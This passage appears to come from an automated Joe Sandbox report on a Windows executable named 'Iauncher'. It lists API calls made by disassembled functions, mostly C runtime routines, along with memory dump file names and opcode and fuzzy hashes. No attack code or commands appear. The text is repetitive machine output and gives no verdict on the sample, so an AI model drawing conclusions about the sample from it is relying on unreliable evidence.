                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F74000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741230875.0000000000F8C000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741260704.0000000000F8D000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f10000_Iauncher.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2417226690-0
                                                                                                                                                                              • Opcode ID: f1daea9017041125a8f8fa9b1b040dc7c615e1fd15d73254639170c1fcda7e79
                                                                                                                                                                              • Instruction ID: 2620d7d875b9e94f3cba4e346023c817f3430087fc1ff6b4c3d5f3f45a33632d
                                                                                                                                                                              • Opcode Fuzzy Hash: f1daea9017041125a8f8fa9b1b040dc7c615e1fd15d73254639170c1fcda7e79
                                                                                                                                                                              • Instruction Fuzzy Hash: 20F0E53670021557CB04EF36EC65B7F7F94EFC2774B064059EA0A8B250C676A946E7E0
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,00F2232C,?,20001004,00000000,00000002,?,?,00F2192E), ref: 00F25D4D
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.1741112549.0000000000F11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                              • Associated: 00000002.00000002.1741093303.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741140251.0000000000F34000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F74000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741230875.0000000000F8C000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741260704.0000000000F8D000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f10000_Iauncher.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InfoLocale
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2299586839-0
                                                                                                                                                                              • Opcode ID: 22fc2c6038a5bc78c16d9250132d2240b3a6a6798e416ce4557aecc4192c365e
                                                                                                                                                                              • Instruction ID: 9515d4b2249a9d8ba0ca682f7d5b6199cd7fd4c9daef55727a35f559f609c18a
                                                                                                                                                                              • Opcode Fuzzy Hash: 22fc2c6038a5bc78c16d9250132d2240b3a6a6798e416ce4557aecc4192c365e
                                                                                                                                                                              • Instruction Fuzzy Hash: 7CE01A3290492CBBCB122F60EC09A9E7A16AF44B60F018010FD05661218B759E61BA90
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(Function_00006F07,00F16457), ref: 00F16F00
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.1741112549.0000000000F11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                              • Associated: 00000002.00000002.1741093303.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741140251.0000000000F34000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F74000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741230875.0000000000F8C000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741260704.0000000000F8D000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f10000_Iauncher.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3192549508-0
                                                                                                                                                                              • Opcode ID: b6e2ea5df889a667a750506d21842f222b62730382c9597a876afbbbad4acacf
                                                                                                                                                                              • Instruction ID: d0c476248c4cc25aec238b7b568d403f5f6dc491cbb8d9a8c7a7a8f0feaa826e
                                                                                                                                                                              • Opcode Fuzzy Hash: b6e2ea5df889a667a750506d21842f222b62730382c9597a876afbbbad4acacf
                                                                                                                                                                              • Instruction Fuzzy Hash:
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.1741112549.0000000000F11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                              • Associated: 00000002.00000002.1741093303.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741140251.0000000000F34000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F74000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741230875.0000000000F8C000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741260704.0000000000F8D000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f10000_Iauncher.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: HeapProcess
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 54951025-0
                                                                                                                                                                              • Opcode ID: 3c6faddcfca631314168ee124315afb306e47011ac8e8dd46c2b3a7ced1844dd
                                                                                                                                                                              • Instruction ID: 6b9cf6ec0d184226e5869f204c4724dda026b73b6a4a5e9ba717ccb018658543
                                                                                                                                                                              • Opcode Fuzzy Hash: 3c6faddcfca631314168ee124315afb306e47011ac8e8dd46c2b3a7ced1844dd
                                                                                                                                                                              • Instruction Fuzzy Hash: BBA01130A022088B83008F30AB08A083AEAAA0A2A23000028A808C0020EB20A080BA00
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              • type_info::operator==.LIBVCRUNTIME ref: 00F19B07
                                                                                                                                                                              • ___TypeMatch.LIBVCRUNTIME ref: 00F19C15
                                                                                                                                                                              • _UnwindNestedFrames.LIBCMT ref: 00F19D67
                                                                                                                                                                              • CallUnexpected.LIBVCRUNTIME ref: 00F19D82
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.1741112549.0000000000F11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                              • Associated: 00000002.00000002.1741093303.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741140251.0000000000F34000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F74000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741230875.0000000000F8C000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741260704.0000000000F8D000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f10000_Iauncher.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                                                                                              • String ID: csm$csm$csm
                                                                                                                                                                              • API String ID: 2751267872-393685449
                                                                                                                                                                              • Opcode ID: 8ad6abcb285fc4d3f2a77b85ffb1ceab3fe8d8ee677081867fc4dfca1f7d7913
                                                                                                                                                                              • Instruction ID: d7987b7e6bd9daaaa433b56079b2e17a3e7219cbd1f9ea23768e73101efd02d1
                                                                                                                                                                              • Opcode Fuzzy Hash: 8ad6abcb285fc4d3f2a77b85ffb1ceab3fe8d8ee677081867fc4dfca1f7d7913
                                                                                                                                                                              • Instruction Fuzzy Hash: 9DB19A71C08209AFCF28DFA4D8919EEB7B5BF14320F14415AE8516B216C3B8DA91EFD1
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              • GetCPInfo.KERNEL32(007005B0,007005B0,?,7FFFFFFF,?,00F30EFA,007005B0,007005B0,?,007005B0,?,?,?,?,007005B0,?), ref: 00F30CD0
                                                                                                                                                                              • __alloca_probe_16.LIBCMT ref: 00F30D8B
                                                                                                                                                                              • __alloca_probe_16.LIBCMT ref: 00F30E1A
                                                                                                                                                                              • __freea.LIBCMT ref: 00F30E65
                                                                                                                                                                              • __freea.LIBCMT ref: 00F30E6B
                                                                                                                                                                              • __freea.LIBCMT ref: 00F30EA1
                                                                                                                                                                              • __freea.LIBCMT ref: 00F30EA7
                                                                                                                                                                              • __freea.LIBCMT ref: 00F30EB7
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.1741112549.0000000000F11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                              • Associated: 00000002.00000002.1741093303.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741140251.0000000000F34000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F74000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741230875.0000000000F8C000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741260704.0000000000F8D000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f10000_Iauncher.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: __freea$__alloca_probe_16$Info
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 127012223-0
                                                                                                                                                                              • Opcode ID: 1adbcfacb1e00edc9b3b78b20a2580d48eb79983e6e4cfe387d9af8c2e57c122
                                                                                                                                                                              • Instruction ID: cda8497e76ad9528a6015d8ce87975c039b389a6e860bfb2fe484e7b6d36663e
                                                                                                                                                                              • Opcode Fuzzy Hash: 1adbcfacb1e00edc9b3b78b20a2580d48eb79983e6e4cfe387d9af8c2e57c122
                                                                                                                                                                              • Instruction Fuzzy Hash: 8E71E572E002199BDF209E94DC61BAF77F69F45770F28055BEC44A7281DF799C80A7A0
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00F194B7
                                                                                                                                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 00F194BF
                                                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00F19548
                                                                                                                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 00F19573
                                                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00F195C8
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.1741112549.0000000000F11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                              • Associated: 00000002.00000002.1741093303.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741140251.0000000000F34000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F74000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741230875.0000000000F8C000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741260704.0000000000F8D000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f10000_Iauncher.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                              • String ID: csm
                                                                                                                                                                              • API String ID: 1170836740-1018135373
                                                                                                                                                                              • Opcode ID: e011c1301fb0a493541fe16e45fdd9995ef4cc525a9a3399db92584d030a275f
                                                                                                                                                                              • Instruction ID: 1c8a68321eb18e9a6520cef0384a89d4ce87d269b7e1b195dd7f286fe2148163
                                                                                                                                                                              • Opcode Fuzzy Hash: e011c1301fb0a493541fe16e45fdd9995ef4cc525a9a3399db92584d030a275f
                                                                                                                                                                              • Instruction Fuzzy Hash: AF418134A042089BCF11DF68CC50ADE7BE6AF45324F188055E8146B292D775EA95EFD1
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.1741112549.0000000000F11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                              • Associated: 00000002.00000002.1741093303.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741140251.0000000000F34000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F74000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741230875.0000000000F8C000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741260704.0000000000F8D000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f10000_Iauncher.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 2785a1c6cd18acc39959c8b82dea44fceb6b44cdfe8933033d068c3bb6a8746c
                                                                                                                                                                              • Instruction ID: 31cdb9fcacd9e71a2689ec67d2de182e6a70eb42a27bdcc02761b59c724c2c54
                                                                                                                                                                              • Opcode Fuzzy Hash: 2785a1c6cd18acc39959c8b82dea44fceb6b44cdfe8933033d068c3bb6a8746c
                                                                                                                                                                              • Instruction Fuzzy Hash: 70B11671E1026AAFDB11DF98EC80BEDBBB5AF45320F144179E4049B3A2C7749D49EB60
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 00F14C73
                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00F14C7D
                                                                                                                                                                              • int.LIBCPMT ref: 00F14C94
                                                                                                                                                                                • Part of subcall function 00F12577: std::_Lockit::_Lockit.LIBCPMT ref: 00F12588
                                                                                                                                                                                • Part of subcall function 00F12577: std::_Lockit::~_Lockit.LIBCPMT ref: 00F125A2
                                                                                                                                                                              • codecvt.LIBCPMT ref: 00F14CB7
                                                                                                                                                                              • std::_Facet_Register.LIBCPMT ref: 00F14CCE
                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00F14CEE
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.1741112549.0000000000F11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                              • Associated: 00000002.00000002.1741093303.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741140251.0000000000F34000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F74000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741230875.0000000000F8C000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741260704.0000000000F8D000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f10000_Iauncher.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 712880209-0
                                                                                                                                                                              • Opcode ID: 657605623abccb504354b135876c4674f0358805e8a9952ed5fde848fc790189
                                                                                                                                                                              • Instruction ID: 1f4757832b93d796064b78cbb59c75922f6a430d188316bf991eb550911d12e6
                                                                                                                                                                              • Opcode Fuzzy Hash: 657605623abccb504354b135876c4674f0358805e8a9952ed5fde848fc790189
                                                                                                                                                                              • Instruction Fuzzy Hash: 2B11D372D006199BCB15EBA4DD456EE77B5BF84730F240419F401A7291DFB8AE80BBD0
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              • GetLastError.KERNEL32(?,?,00F19671,00F19427,00F16F4B), ref: 00F19688
                                                                                                                                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00F19696
                                                                                                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00F196AF
                                                                                                                                                                              • SetLastError.KERNEL32(00000000,00F19671,00F19427,00F16F4B), ref: 00F19701
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.1741112549.0000000000F11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                              • Associated: 00000002.00000002.1741093303.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741140251.0000000000F34000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F74000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741230875.0000000000F8C000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741260704.0000000000F8D000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f10000_Iauncher.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3852720340-0
                                                                                                                                                                              • Opcode ID: 53b912988c80a4f810dc14b0de3d7d849e60bcb0aa2bd1c1c7146bae0ce609a7
                                                                                                                                                                              • Instruction ID: c28bc62ee69dad37106175f99261c2a5168db1e4cb1667bc7f2c0e9b5f23a55c
                                                                                                                                                                              • Opcode Fuzzy Hash: 53b912988c80a4f810dc14b0de3d7d849e60bcb0aa2bd1c1c7146bae0ce609a7
                                                                                                                                                                              • Instruction Fuzzy Hash: 7B01D47260E2169EA61926757C957DA3A46FF027707300229F921851E0EFE29C81B296
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00F11E09
                                                                                                                                                                              • int.LIBCPMT ref: 00F11E1C
                                                                                                                                                                                • Part of subcall function 00F12577: std::_Lockit::_Lockit.LIBCPMT ref: 00F12588
                                                                                                                                                                                • Part of subcall function 00F12577: std::_Lockit::~_Lockit.LIBCPMT ref: 00F125A2
                                                                                                                                                                              • std::_Facet_Register.LIBCPMT ref: 00F11E4F
                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00F11E65
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.1741112549.0000000000F11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                              • Associated: 00000002.00000002.1741093303.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741140251.0000000000F34000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F74000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741230875.0000000000F8C000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741260704.0000000000F8D000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f10000_Iauncher.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                                                                                                                              • String ID: pKp
                                                                                                                                                                              • API String ID: 459529453-3896006320
                                                                                                                                                                              • Opcode ID: 57ef15024ebebd2c5cc75960999befdb79e243f651c15e7c9f03d9354c99dcde
                                                                                                                                                                              • Instruction ID: 7247cde9b644d3747f2df3fe2fa477b3b8f7397997a435d5d1d4390875ef76cd
                                                                                                                                                                              • Opcode Fuzzy Hash: 57ef15024ebebd2c5cc75960999befdb79e243f651c15e7c9f03d9354c99dcde
                                                                                                                                                                              • Instruction Fuzzy Hash: CA01A732900114ABCB15ABA4DC059EE7769EF80770F600158F901A7291EF74AE81F790
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00F11D90
                                                                                                                                                                              • int.LIBCPMT ref: 00F11DA3
                                                                                                                                                                                • Part of subcall function 00F12577: std::_Lockit::_Lockit.LIBCPMT ref: 00F12588
                                                                                                                                                                                • Part of subcall function 00F12577: std::_Lockit::~_Lockit.LIBCPMT ref: 00F125A2
                                                                                                                                                                              • std::_Facet_Register.LIBCPMT ref: 00F11DD6
                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00F11DEC
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.1741112549.0000000000F11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                              • Associated: 00000002.00000002.1741093303.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741140251.0000000000F34000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F74000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741230875.0000000000F8C000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741260704.0000000000F8D000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f10000_Iauncher.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                                                                                                                              • String ID: Ip
                                                                                                                                                                              • API String ID: 459529453-2509181420
                                                                                                                                                                              • Opcode ID: 1b03e80d1623688cd145e9dc003eefef3b28fc53b71862e2a3498438c75986c6
                                                                                                                                                                              • Instruction ID: 88d2aed6f25b8d8635217892579278909592e06f1e3d78fcaf2a27a1b68baeae
                                                                                                                                                                              • Opcode Fuzzy Hash: 1b03e80d1623688cd145e9dc003eefef3b28fc53b71862e2a3498438c75986c6
                                                                                                                                                                              • Instruction Fuzzy Hash: 9601D676900114ABCB19ABA8EC058EE7769EF80770F240158F901AB2D1EF34EEC1F794
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,A03C9F43,?,?,00000000,00F32854,000000FF,?,00F20E39,?,?,00F20E0D,00000000), ref: 00F20EDE
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00F20EF0
                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,00000000,00F32854,000000FF,?,00F20E39,?,?,00F20E0D,00000000), ref: 00F20F12
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.1741112549.0000000000F11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                              • Associated: 00000002.00000002.1741093303.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741140251.0000000000F34000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmpDownload File
